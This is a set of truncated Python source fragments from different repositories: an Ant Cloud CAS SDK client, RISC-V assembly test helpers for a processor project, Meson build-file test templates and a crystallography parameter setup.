headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.DeleteAppgroupResponse:
"""
Description: 删除分组
Summary: 删除分组
"""
UtilClient.validate_model(request)
return cas_models.DeleteAppgroupResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.delete', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def update_appgroup(
self,
request: cas_models.UpdateAppgroupRequest,
) -> cas_models.UpdateAppgroupResponse:
"""
Description: 更新分组
Summary: 更新分组
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.update_appgroup_ex(request, headers, runtime)
async def update_appgroup_async(
self,
request: cas_models.UpdateAppgroupRequest,
) -> cas_models.UpdateAppgroupResponse:
"""
Description: 更新分组
Summary: 更新分组
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.update_appgroup_ex_async(request, headers, runtime)
def update_appgroup_ex(
self,
request: cas_models.UpdateAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.UpdateAppgroupResponse:
"""
Description: 更新分组
Summary: 更新分组
"""
UtilClient.validate_model(request)
return cas_models.UpdateAppgroupResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.update', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def update_appgroup_ex_async(
self,
request: cas_models.UpdateAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.UpdateAppgroupResponse:
"""
Description: 更新分组
Summary: 更新分组
"""
UtilClient.validate_model(request)
return cas_models.UpdateAppgroupResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.update', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def list_applevel(
self,
request: cas_models.ListApplevelRequest,
) -> cas_models.ListApplevelResponse:
"""
Description: 列出所有应用等级
Summary: 列出所有应用等级
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.list_applevel_ex(request, headers, runtime)
async def list_applevel_async(
self,
request: cas_models.ListApplevelRequest,
) -> cas_models.ListApplevelResponse:
"""
Description: 列出所有应用等级
Summary: 列出所有应用等级
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.list_applevel_ex_async(request, headers, runtime)
def list_applevel_ex(
self,
request: cas_models.ListApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ListApplevelResponse:
"""
Description: 列出所有应用等级
Summary: 列出所有应用等级
"""
UtilClient.validate_model(request)
return cas_models.ListApplevelResponse().from_map(
self.do_request('1.0', 'antcloud.cas.applevel.list', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def list_applevel_ex_async(
self,
request: cas_models.ListApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ListApplevelResponse:
"""
Description: 列出所有应用等级
Summary: 列出所有应用等级
"""
UtilClient.validate_model(request)
return cas_models.ListApplevelResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.applevel.list', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def exist_applevel(
self,
request: cas_models.ExistApplevelRequest,
) -> cas_models.ExistApplevelResponse:
"""
Description: 应用等级是否存在
Summary: 应用等级是否存在
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.exist_applevel_ex(request, headers, runtime)
async def exist_applevel_async(
self,
request: cas_models.ExistApplevelRequest,
) -> cas_models.ExistApplevelResponse:
"""
Description: 应用等级是否存在
Summary: 应用等级是否存在
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.exist_applevel_ex_async(request, headers, runtime)
def exist_applevel_ex(
self,
request: cas_models.ExistApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ExistApplevelResponse:
"""
Description: 应用等级是否存在
Summary: 应用等级是否存在
"""
UtilClient.validate_model(request)
return cas_models.ExistApplevelResponse().from_map(
self.do_request('1.0', 'antcloud.cas.applevel.exist', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def exist_applevel_ex_async(
self,
request: cas_models.ExistApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ExistApplevelResponse:
"""
Description: 应用等级是否存在
Summary: 应用等级是否存在
"""
UtilClient.validate_model(request)
return cas_models.ExistApplevelResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.applevel.exist', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def create_applevel(
self,
request: cas_models.CreateApplevelRequest,
) -> cas_models.CreateApplevelResponse:
"""
Description: 创建应用等级
Summary: 创建应用等级
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.create_applevel_ex(request, headers, runtime)
async def create_applevel_async(
self,
request: cas_models.CreateApplevelRequest,
) -> cas_models.CreateApplevelResponse:
"""
Description: 创建应用等级
Summary: 创建应用等级
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.create_applevel_ex_async(request, headers, runtime)
def create_applevel_ex(
self,
request: cas_models.CreateApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.CreateApplevelResponse:
"""
Description: 创建应用等级
Summary: 创建应用等级
"""
UtilClient.validate_model(request)
return cas_models.CreateApplevelResponse().from_map(
self.do_request('1.0', 'antcloud.cas.applevel.create', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def create_applevel_ex_async(
self,
request: cas_models.CreateApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.CreateApplevelResponse:
"""
Description: 创建应用等级
Summary: 创建应用等级
"""
UtilClient.validate_model(request)
return cas_models.CreateApplevelResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.applevel.create', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def delete_applevel(
self,
request: cas_models.DeleteApplevelRequest,
) -> cas_models.DeleteApplevelResponse:
"""
Description: 删除应用分组
Summary: 删除应用分组
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.delete_applevel_ex(request, headers, runtime)
async def delete_applevel_async(
self,
request: cas_models.DeleteApplevelRequest,
) -> cas_models.DeleteApplevelResponse:
"""
Description: 删除应用分组
Summary: 删除应用分组
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.delete_applevel_ex_async(request, headers, runtime)
def delete_applevel_ex(
self,
request: cas_models.DeleteApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.DeleteApplevelResponse:
"""
Description: 删除应用分组
Summary: 删除应用分组
"""
UtilClient.validate_model(request)
return cas_models.DeleteApplevelResponse().from_map(
self.do_request('1.0', 'antcloud.cas.applevel.delete', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def delete_applevel_ex_async(
self,
request: cas_models.DeleteApplevelRequest,
headers: | |
<reponame>cornell-brg/lizard
#=========================================================================
# inst_utils
#=========================================================================
# Includes helper functions to simplify creating assembly tests.
from pymtl import *
from tests.context import lizard
#-------------------------------------------------------------------------
# print_asm
#-------------------------------------------------------------------------
# Pretty print a generated assembly syntax
def print_asm(asm_code):
# If asm_code is a single string, then put it in a list to simplify the
# rest of the logic.
asm_code_list = asm_code
if isinstance(asm_code, str):
asm_code_list = [asm_code]
# Create a single list of lines
asm_list = []
for asm_seq in asm_code_list:
asm_list.extend(asm_seq.splitlines())
# Print the assembly. Remove duplicate blank lines.
prev_blank_line = False
for asm in asm_list:
if asm.strip() == "":
if not prev_blank_line:
print asm
prev_blank_line = True
else:
prev_blank_line = False
print asm
#-------------------------------------------------------------------------
# gen_nops
#-------------------------------------------------------------------------
def gen_nops(num_nops):
if num_nops > 0:
return "nop\n" + (" nop\n" * (num_nops - 1))
else:
return ""
#-------------------------------------------------------------------------
# gen_word_data
#-------------------------------------------------------------------------
def gen_word_data(data_list):
data_str = ".data\n"
for data in data_list:
data_str += ".word {}\n".format(data)
return data_str
#-------------------------------------------------------------------------
# gen_hword_data
#-------------------------------------------------------------------------
def gen_hword_data(data_list):
data_str = ".data\n"
for data in data_list:
data_str += ".hword {}\n".format(data)
return data_str
#-------------------------------------------------------------------------
# gen_byte_data
#-------------------------------------------------------------------------
def gen_byte_data(data_list):
data_str = ".data\n"
for data in data_list:
data_str += ".byte {}\n".format(data)
return data_str
#-------------------------------------------------------------------------
# gen_rr_src01_template
#-------------------------------------------------------------------------
# Template for register-register instructions. We first write src0
# register and then write the src1 register before executing the
# instruction under test. We parameterize the number of nops after
# writing both src registers and the instruction under test to enable
# using this template for testing various bypass paths. We also
# parameterize the register specifiers to enable using this template to
# test situations where the srce registers are equal and/or equal the
# destination register.
def gen_rr_src01_template(num_nops_src0, num_nops_src1, num_nops_dest, reg_src0,
reg_src1, inst, src0, src1, result):
return """
# Move src0 value into register
csrr {reg_src0}, mngr2proc < {src0}
{nops_src0}
# Move src1 value into register
csrr {reg_src1}, mngr2proc < {src1}
{nops_src1}
# Instruction under test
{inst} x3, {reg_src0}, {reg_src1}
{nops_dest}
# Check the result
csrw proc2mngr, x3 > {result}
""".format(
nops_src0=gen_nops(num_nops_src0),
nops_src1=gen_nops(num_nops_src1),
nops_dest=gen_nops(num_nops_dest),
**locals())
#-------------------------------------------------------------------------
# gen_rr_src10_template
#-------------------------------------------------------------------------
# Similar to the above template, except that we reverse the order in
# which we write the two src registers.
def gen_rr_src10_template(num_nops_src0, num_nops_src1, num_nops_dest, reg_src0,
reg_src1, inst, src0, src1, result):
return """
# Move src1 value into register
csrr {reg_src1}, mngr2proc < {src1}
{nops_src1}
# Move src0 value into register
csrr {reg_src0}, mngr2proc < {src0}
{nops_src0}
# Instruction under test
{inst} x3, {reg_src0}, {reg_src1}
{nops_dest}
# Check the result
csrw proc2mngr, x3 > {result}
""".format(
nops_src0=gen_nops(num_nops_src0),
nops_src1=gen_nops(num_nops_src1),
nops_dest=gen_nops(num_nops_dest),
**locals())
#-------------------------------------------------------------------------
# gen_rr_dest_dep_test
#-------------------------------------------------------------------------
# Test the destination bypass path by varying how many nops are
# inserted between the instruction under test and reading the destination
# register with a csrr instruction.
def gen_rr_dest_dep_test(num_nops, inst, src0, src1, result):
return gen_rr_src01_template(0, 8, num_nops, "x1", "x2", inst, src0, src1,
result)
#-------------------------------------------------------------------------
# gen_rr_src1_dep_test
#-------------------------------------------------------------------------
# Test the source 1 bypass paths by varying how many nops are inserted
# between writing the src1 register and reading this register in the
# instruction under test.
def gen_rr_src1_dep_test(num_nops, inst, src0, src1, result):
return gen_rr_src01_template(8 - num_nops, num_nops, 0, "x1", "x2", inst,
src0, src1, result)
#-------------------------------------------------------------------------
# gen_rr_src0_dep_test
#-------------------------------------------------------------------------
# Test the source 0 bypass paths by varying how many nops are inserted
# between writing the src0 register and reading this register in the
# instruction under test.
def gen_rr_src0_dep_test(num_nops, inst, src0, src1, result):
return gen_rr_src10_template(num_nops, 8 - num_nops, 0, "x1", "x2", inst,
src0, src1, result)
#-------------------------------------------------------------------------
# gen_rr_srcs_dep_test
#-------------------------------------------------------------------------
# Test both source bypass paths at the same time by varying how many nops
# are inserted between writing both src registers and reading both
# registers in the instruction under test.
def gen_rr_srcs_dep_test(num_nops, inst, src0, src1, result):
return gen_rr_src01_template(0, num_nops, 0, "x1", "x2", inst, src0, src1,
result)
#-------------------------------------------------------------------------
# gen_rr_src0_eq_dest_test
#-------------------------------------------------------------------------
# Test situation where the src0 register specifier is the same as the
# destination register specifier.
def gen_rr_src0_eq_dest_test(inst, src0, src1, result):
return gen_rr_src01_template(0, 0, 0, "x3", "x2", inst, src0, src1, result)
#-------------------------------------------------------------------------
# gen_rr_src1_eq_dest_test
#-------------------------------------------------------------------------
# Test situation where the src1 register specifier is the same as the
# destination register specifier.
def gen_rr_src1_eq_dest_test(inst, src0, src1, result):
return gen_rr_src01_template(0, 0, 0, "x1", "x3", inst, src0, src1, result)
#-------------------------------------------------------------------------
# gen_rr_src0_eq_src1_test
#-------------------------------------------------------------------------
# Test situation where the src register specifiers are the same.
def gen_rr_src0_eq_src1_test(inst, src, result):
return gen_rr_src01_template(0, 0, 0, "x1", "x1", inst, src, src, result)
#-------------------------------------------------------------------------
# gen_rr_srcs_eq_dest_test
#-------------------------------------------------------------------------
# Test situation where all three register specifiers are the same.
def gen_rr_srcs_eq_dest_test(inst, src, result):
return gen_rr_src01_template(0, 0, 0, "x3", "x3", inst, src, src, result)
#-------------------------------------------------------------------------
# gen_rr_value_test
#-------------------------------------------------------------------------
# Test the actual operation of a register-register instruction under
# test. We assume that bypassing has already been tested.
def gen_rr_value_test(inst, src0, src1, result):
return gen_rr_src01_template(0, 0, 0, "x1", "x2", inst, src0, src1, result)
#-------------------------------------------------------------------------
# gen_rimm_template
#-------------------------------------------------------------------------
# Template for register-immediate instructions. We first write the src
# register before executing the instruction under test. We parameterize
# the number of nops after writing the src register and the instruction
# under test to enable using this template for testing various bypass
# paths. We also parameterize the register specifiers to enable using
# this template to test situations where the srce registers are equal
# and/or equal the destination register.
def gen_rimm_template(num_nops_src, num_nops_dest, reg_src, inst, src, imm,
result):
return """
# Move src value into register
csrr {reg_src}, mngr2proc < {src}
{nops_src}
# Instruction under test
{inst} x3, {reg_src}, {imm}
{nops_dest}
# Check the result
csrw proc2mngr, x3 > {result}
""".format(
nops_src=gen_nops(num_nops_src),
nops_dest=gen_nops(num_nops_dest),
**locals())
#-------------------------------------------------------------------------
# gen_rimm_dest_dep_test
#-------------------------------------------------------------------------
# Test the destination bypass path by varying how many nops are
# inserted between the instruction under test and reading the destination
# register with a csrr instruction.
def gen_rimm_dest_dep_test(num_nops, inst, src, imm, result):
return gen_rimm_template(8, num_nops, "x1", inst, src, imm, result)
#-------------------------------------------------------------------------
# gen_rimm_src_dep_test
#-------------------------------------------------------------------------
# Test the source bypass paths by varying how many nops are inserted
# between writing the src register and reading this register in the
# instruction under test.
def gen_rimm_src_dep_test(num_nops, inst, src, imm, result):
return gen_rimm_template(num_nops, 0, "x1", inst, src, imm, result)
#-------------------------------------------------------------------------
# gen_rimm_src_eq_dest_test
#-------------------------------------------------------------------------
# Test situation where the src register specifier is the same as the
# destination register specifier.
def gen_rimm_src_eq_dest_test(inst, src, imm, result):
return gen_rimm_template(0, 0, "x3", inst, src, imm, result)
#-------------------------------------------------------------------------
# gen_rimm_value_test
#-------------------------------------------------------------------------
# Test the actual operation of a register-immediate instruction under
# test. We assume that bypassing has already been tested.
def gen_rimm_value_test(inst, src, imm, result):
return gen_rimm_template(0, 0, "x1", inst, src, imm, result)
#-------------------------------------------------------------------------
# gen_imm_template
#-------------------------------------------------------------------------
# Template for immediate instructions. We parameterize the number of nops
# after the instruction under test to enable using this template for
# testing various bypass paths.
def gen_imm_template(num_nops_dest, inst, imm, result):
return """
# Instruction under test
{inst} x3, {imm}
{nops_dest}
# Check the result
csrw proc2mngr, x3 > {result}
""".format(
nops_dest=gen_nops(num_nops_dest), **locals())
#-------------------------------------------------------------------------
# gen_imm_dest_dep_test
#-------------------------------------------------------------------------
# Test the destination bypass path by varying how many nops are
# inserted between the instruction under test and reading the destination
# register with a csrr instruction.
def gen_imm_dest_dep_test(num_nops, inst, imm, result):
return gen_imm_template(num_nops, inst, imm, result)
#-------------------------------------------------------------------------
# gen_imm_value_test
#-------------------------------------------------------------------------
# Test the actual operation of an immediate instruction under test. We
# assume that bypassing has already been tested.
def gen_imm_value_test(inst, imm, result):
return gen_imm_template(0, inst, imm, result)
#-------------------------------------------------------------------------
# gen_br2_template
#-------------------------------------------------------------------------
# Template for branch instructions with two sources. We test two forward
# branches and one backwards branch. The way we actually do the test is
# we update a register to reflect the control flow; certain bits in this
# register are set at different points in the program. Then we can check
# the control flow bits at the end to see if only the bits we expect are
# set (i.e., the program only executed those points that we expect). Note
# that test also makes sure that the instruction in the branch delay slot
# is _not_ executed.
# We currently need the id to create labels unique to this test. We might
# eventually allow local labels (e.g., 1f, 1b) as in gas.
gen_br2_template_id = 0
def gen_br2_template(num_nops_src0, num_nops_src1, reg_src0, reg_src1, inst,
src0, src1, taken):
# Determine the expected control flow pattern
if taken:
control_flow_pattern = 0b101010
else:
control_flow_pattern = 0b111111
# Create unique labels
global gen_br2_template_id
id_a = "label_{}".format(gen_br2_template_id + 1)
id_b = "label_{}".format(gen_br2_template_id + 2)
id_c = "label_{}".format(gen_br2_template_id + 3)
gen_br2_template_id += 3
return """
# x3 will track the control flow pattern
addi x3, x0, 0
# Move src0 value into register
csrr {reg_src0}, mngr2proc < {src0}
{nops_src0}
# Move src1 value into register
csrr {reg_src1}, mngr2proc < {src1}
{nops_src1}
{inst} {reg_src0}, {reg_src1}, {id_a} # br -.
addi x3, x3, 0b000001 # |
# |
{id_b}: | |
<reponame>nnamua/meson-classification-checker
# SPDX-FileCopyrightText: 2021 <NAME>
#
# SPDX-License-Identifier: Apache-2.0
from buildfile import IGNORE_STRING, BuildFile
from typing import Union
from util import varname
import objects, functions, os
"""
This file specifies templates for each type. The dictionary 'templates' contains
all regular templates, while the dictionary 'special' contains further template
dictionaries for functions and methods. In such a special template dictionary
the user can define templates for:
(1) the object of the method
(2) a certain parameter
(3) a certain parameter and a type, using key (param_name, T)
The variable 'OBJECT' can be used to reference, that a method requires a special
object to operate on.
The variables 'RANDOM_STRING' and 'BUILDFILE_DIR' by a respective string on usage.
'RANDOM_STRING' is required for target names, because multiple target must not share
the name.
"""
class TemplateNotFoundException(Exception):
pass
OBJECT = "_obj" # If a method requires a specific object, use this key in special templates
RANDOM_STRING = "$RANDOM_STRING$" # This substring will be replaced by a random string when fetching a template
BUILDFILE_DIR = "$BUILDFILE_DIR$" # This substring will be replaced by the working directory of the buildfile
def get_template(T, name=None, special_templates_key=None):
"""Returns the (special) template for a given type."""
# Without a special templates key (or a non-existing one), return regular template
if special_templates_key == None or special_templates_key not in special:
try:
tmpl = templates[T]
return tmpl.replace(RANDOM_STRING, f"'{varname()}'")
except KeyError:
raise TemplateNotFoundException(f"No template found for type {T}")
# Otherwise, return special template
special_templates = special[special_templates_key]
try:
if (name, T) in special_templates:
tmpl = special_templates[(name, T)]
elif name in special_templates:
tmpl = special_templates[name]
elif T in special_templates:
tmpl = special_templates[T]
else:
tmpl = templates[T]
except KeyError:
raise TemplateNotFoundException(f"No template found for type {T}")
return tmpl.replace(RANDOM_STRING, f"'{varname()}'")
def has_special_template(T, name, special_templates_key):
"""Returns whether a special template exists for the given combination."""
if special_templates_key not in special:
return False
special_templates = special[special_templates_key]
return (name, T) in special_templates or name in special_templates
templates = {
# Built-in objects
objects.Boolean : "true",
objects.Number : "42",
objects.String : "'String'",
objects.Dict : "{ 'foo' : 1, 'bar' : 2 }",
objects.Array : "[ 'str', 1, true ]",
objects.Meson : "meson",
objects.BuildMachine : "build_machine",
objects.HostMachine : "host_machine",
objects.TargetMachine: "target_machine",
# Returned objects
objects.File : "files('foo.c')[0]",
objects.ExternalFile : "files('foo.c')[0]",
objects.Compiler : "meson.get_compiler('c')",
objects.Dependency : "declare_dependency()",
objects.Environment : "environment()",
objects.ExternalProgram : "find_program('python3')",
objects.ConfiguredFile : "configure_file(input : 'config.h.in', output: 'config.h', configuration: configuration_data())",
objects.Executable : f"executable({RANDOM_STRING}, sources : ['foo.c'])",
objects.BuildTarget : f"build_target({RANDOM_STRING}, sources : ['foo.c'], target_type : 'executable')",
objects.Target : f"build_target({RANDOM_STRING}, sources : ['foo.c'], target_type : 'executable')",
objects.Jar : f"jar({RANDOM_STRING}, sources: 'foo.java')",
objects.ConfigurationData : "configuration_data({ 'foo' : 1, 'bar' : false })",
objects.CustomTarget : f"custom_target({RANDOM_STRING}, output : 'bar.c', input : 'bar.txt', command : [ find_program('script.py'), '@INPUT@', '@OUTPUT@'])",
objects.CustomTargetIndex : f"custom_target({RANDOM_STRING}, output : 'bar.c', input : 'bar.txt', command : [ find_program('script.py'), '@INPUT@', '@OUTPUT@'])[0]",
objects.Disabler : "disabler()",
objects.ExternalLibrary : "meson.get_compiler('c').find_library('m', required : false)",
objects.FeatureOption : "get_option('ft')",
objects.Generator : f"generator(executable({RANDOM_STRING}, sources: 'foo.c'), arguments : [ 'foo', '@EXTRA_ARGS@' ], output : '@BASENAME@')",
objects.Subproject : "subproject('foo_project')",
objects.RunResult : f"run_command(find_program('script.py'), [])",
objects.CompilationRunResult : f"meson.get_compiler('c').run('foo.c')",
objects.Module : "import('keyval')",
objects.IncludeDirectory : "include_directories('include')",
objects.BothLibraries : f"both_libraries({RANDOM_STRING}, sources : 'foo.c')",
objects.Library : f"library({RANDOM_STRING}, sources : 'foo.c')",
objects.SharedLibrary : f"shared_library({RANDOM_STRING}, sources : 'foo.c')",
objects.StaticLibrary : f"static_library({RANDOM_STRING}, sources : 'foo.c')",
objects.Range : "range(0,10,1)",
objects.SharedModule : f"shared_module({RANDOM_STRING}, sources : 'foo.c')",
objects.GeneratorTarget : "generator(find_program('script.py'), output : '@[email protected]', arguments : [ '@INPUT@' ]).process('foo.c')",
objects.RunTarget : f"run_target({RANDOM_STRING}, command : ['meson'])",
# Arrays with specified type
objects.Array[objects.Boolean] : "[ true, false ]",
objects.Array[objects.Number] : "[ 1, 2, 3 ]",
objects.Array[objects.String] : "[ 'foo', 'bar' ]",
objects.Array[objects.File] : "files('foo.c', 'bar.c')",
objects.Array[objects.ExternalFile] : "files('foo.c', 'bar.c')",
objects.Array[objects.Dependency] : "[ declare_dependency(), declare_dependency() ]",
objects.Array[objects.Target] : f"[ build_target({RANDOM_STRING}, sources : ['foo.c'], target_type : 'executable') ]",
objects.Array[objects.IncludeDirectory] : "include_directories('include')",
objects.Array[objects.Library] : f"[ library({RANDOM_STRING}, 'foo.c') ]",
objects.Array[objects.CustomTarget] : f"[custom_target({RANDOM_STRING}, output : 'bar.c', input : 'bar.txt', command : [ find_program('script.py'), '@INPUT@', '@OUTPUT@'])]",
objects.Array[Union[objects.String, objects.Number]] : "[ 'str', 2 ]",
objects.Array[Union[objects.String, objects.File]] : "[ files('foo.c')[0], 'bar.c' ]",
objects.Array[Union[objects.String, objects.Target]] : f"[ 'bar.c', build_target({RANDOM_STRING}, sources : ['foo.c'], target_type : 'executable') ]",
objects.Array[Union[objects.String, objects.File, objects.Target]] : f"[ files('foo.c')[0], 'bar.c', build_target({RANDOM_STRING}, sources : ['foo.c'], target_type : 'executable') ]",
objects.Array[Union[objects.Library, objects.CustomTarget]] : f"[ library({RANDOM_STRING}, 'foo.c') ]",
objects.Array[Union[objects.ExternalLibrary, objects.CustomTarget]] : "[ meson.get_compiler('c').find_library('m', required : false) ]",
objects.Array[Union[objects.IncludeDirectory, objects.String]] : "[ include_directories('include'), 'include' ]"
}
special = {
objects.String.join : {
"list_of_strings" : "[ 'str1', 'str2' ]"
},
objects.String.to_int : {
OBJECT : "'42'"
},
objects.Dict.get : {
"key" : "'foo'"
},
objects.Array.get : {
OBJECT : "[ 1, 2, 3]",
"index" : "0"
},
objects.Array.__getitem__ : {
OBJECT : "[ 1, 2, 3]",
"index" : "0"
},
objects.Compiler.alignment : {
"type_name" : "'int'",
"args" : "[]"
},
objects.Compiler.check_header : {
"header_name" : "'stdio.h'",
"dependencies" : "[]",
"prefix" : "''",
"required" : "false"
},
objects.Compiler.compute_int : {
"expr" : "'1 + 2'"
},
objects.Compiler.get_supported_function_attributes : {
"list_of_names" : "[ 'error' ]"
},
objects.Compiler.has_function_attribute : {
"name" : "'error'"
},
objects.Compiler.has_header : {
"header_name" : "'stdio.h'",
"dependencies" : "[]",
"prefix" : "''",
"args" : "[ '-Werror' ]",
("required", objects.Boolean) : "false"
},
objects.Compiler.has_header_symbol : {
"header_name" : "'stdio.h'",
"symbol_name" : "'printf'",
"dependencies" : "[]",
"prefix" : "''",
"args" : "[ '-Werror' ]",
("required", objects.Boolean) : "false"
},
objects.CustomTarget.__getitem__ : {
"index" : "0",
},
objects.Meson.get_compiler : {
"language" : "'c'"
},
objects.Meson.add_dist_script : {
("script_name", objects.String) : "'script.py'",
("script_name", objects.File) : "files('script.py')[0]"
},
objects.Meson.add_install_script : {
("script_name", objects.String) : "'script.py'",
("script_name", objects.File) : "files('script.py')[0]"
},
objects.Meson.add_postconf_script : {
("script_name", objects.String) : "'script.py'",
("script_name", objects.File) : "files('script.py')[0]"
},
objects.BuildTarget.extract_objects : {
"sources" : "'foo.c'"
},
objects.ConfigurationData.get : {
OBJECT : "configuration_data({ 'foo' : 1, 'bar' : false })",
"var_name" : "'foo'"
},
objects.ConfigurationData.get_unquoted : {
OBJECT : "configuration_data({ 'foo' : 1, 'bar' : false })",
"var_name" : "'foo'"
},
objects.Dependency.as_system : {
"value" : "'preserve'"
},
objects.Generator.process : {
"extra_args" : "[ 'bar' ]",
"preserve_path_from" : "'C:/'" if os.name == "nt" else "'/'"
},
objects.Range.__getitem__ : {
"index" : "0"
},
objects.BothLibraries.extract_objects : {
# https://mesonbuild.com/Build-targets.html#object-files
# No sources can be extracted in this simple template example
"sources" : "[]"
},
functions.add_global_arguments : {
("language", objects.String) : "'c'",
("language", objects.Array[objects.String]) : "['c', 'cpp']"
},
functions.add_global_link_arguments : {
("language", objects.String) : "'c'",
("language", objects.Array[objects.String]) : "['c', 'cpp']"
},
functions.add_languages : {
("langs", objects.String) : "'c'",
("langs", objects.Array[objects.String]) : "['c', 'cpp']"
},
functions.add_project_arguments : {
("language", objects.String) : "'c'",
("language", objects.Array[objects.String]) : "['c', 'cpp']"
},
functions.add_project_link_arguments : {
("language", objects.String) : "'c'",
("language", objects.Array[objects.String]) : "['c', 'cpp']"
},
functions.add_test_setup : {
("env", objects.Array[objects.String]) : "['key1=val1', 'key2=val2']",
("env", objects.Dict) : "{ 'key1' : 'value1', 'key2' : 'value2' }",
},
functions.benchmark : {
"name" : RANDOM_STRING,
("executable", objects.ExternalFile) : "files('script.py')[0]",
"workdir" : f"'{os.getcwd()}'",
"protocol" : "'exitcode'",
("env", objects.Array[objects.String]) : "['key1=val1', 'key2=val2']",
("env", objects.Dict) : "{ 'key1' : 'value1', 'key2' : 'value2' }",
},
functions.both_libraries : {
"library_name" : RANDOM_STRING,
("sources", objects.String) : "'foo.c'",
"install_mode" : "'rwxr-xr-x'",
"override_options" : "[ 'key1=value1', 'key2=value2' ]",
"link_whole" : f"[ static_library({RANDOM_STRING}, 'foo.c') ]",
"link_with": f"[ static_library({RANDOM_STRING}, 'foo.c') ]"
},
functions.build_target : {
"name" : RANDOM_STRING,
("sources", objects.String) : "'foo.c'",
"install_mode" : "'rwxr-xr-x'",
"override_options" : "[ 'key1=value1', 'key2=value2' ]",
"link_whole" : f"[ static_library({RANDOM_STRING}, 'foo.c') ]",
"link_with": f"[ static_library({RANDOM_STRING}, 'foo.c') ]",
"target_type" : "'executable'",
"win_subsystem" : "'console'",
"gnu_symbol_visibility" : "''",
"link_language" : "'c'"
},
functions.configuration_data : {
"dict" : "{ 'foo' : 1, 'bar' : false }"
},
functions.configure_file : {
"format" : "'meson'",
"output_format" : "'c'",
("depfile", objects.String) : "'foo.c'",
("input", objects.String) : "'bar.c'",
"install_mode" : "'rwxr-xr-x'"
},
functions.custom_target : {
"name" : RANDOM_STRING,
"install_mode" : "'rwxr-xr-x'",
("env", objects.Array[objects.String]) : "['key1=val1', 'key2=val2']",
("env", objects.Dict) : "{ 'key1' : 'value1', 'key2' : 'value2' }",
},
functions.declare_dependency : {
("variables", objects.Dict) : "{ 'key1' : 'value1', 'key2' : 'value2' }",
("variables", objects.Array[objects.String]) : "[ 'key1=value1', 'key2=value2' ]",
("include_directories", objects.String) : "'include'"
},
functions.dependency : {
"dependency_name" : "'netcdf'",
"language" : "'c'",
"method" : "'auto'",
"default_options" : "[ 'key1=value1', 'key2=value2' ]",
("fallback", objects.String) : "'foo_project'",
("fallback", objects.Array[objects.String]) : "[ 'foo_project', 'foo_dep' ]",
"required" : "false",
"include_type" : "'preserve'"
},
functions.error : {
"message" : | |
= self.params.init
sigma = self.params.sigmas
mins = self.params.mins
maxs = self.params.maxs
centers = self.params.centers
betas = self.params.betas
if not self.params.use_restraints or self.params.fix.ucell:
centers.ucell = [1,1,1,1,1,1]
betas.ucell = [1,1,1,1,1,1]
fix = self.params.fix
P = Parameters()
for i_xtal in range(self.SIM.num_xtals):
for ii in range(3):
p = ParameterType(init=0, sigma=sigma.RotXYZ[ii],
minval=mins.RotXYZ[ii], maxval=maxs.RotXYZ[ii],
fix=fix.RotXYZ, name="RotXYZ%d_xtal%d" % (ii,i_xtal),
center=centers.RotXYZ[ii], beta=betas.RotXYZ)
P.add(p)
p = ParameterType(init=init.G + init.G*0.01*i_xtal, sigma=sigma.G,
minval=mins.G, maxval=maxs.G,
fix=fix.G, name="G_xtal%d" %i_xtal,
center=centers.G, beta=betas.G)
P.add(p)
# these parameters are equal for all texture-domains within a crystal
fix_Nabc = [fix.Nabc]*3
if self.params.simulator.crystal.has_isotropic_ncells:
fix_Nabc = [fix_Nabc[0], True, True]
fix_difsig = [fix.diffuse_sigma]*3
if self.params.isotropic.diffuse_sigma:
fix_difsig = [fix_difsig[0], True, True]
fix_difgam = [fix.diffuse_gamma]*3
if self.params.isotropic.diffuse_gamma:
fix_difgam = [fix_difgam[0], True, True]
fix_eta = [fix.eta_abc]*3
if self.params.simulator.crystal.has_isotropic_mosaicity:
fix_eta = [fix_eta[0], True, True]
for ii in range(3):
# Mosaic domain tensor
p = ParameterType(init=init.Nabc[ii], sigma=sigma.Nabc[ii],
minval=mins.Nabc[ii], maxval=maxs.Nabc[ii],
fix=fix_Nabc[ii], name="Nabc%d" % (ii,),
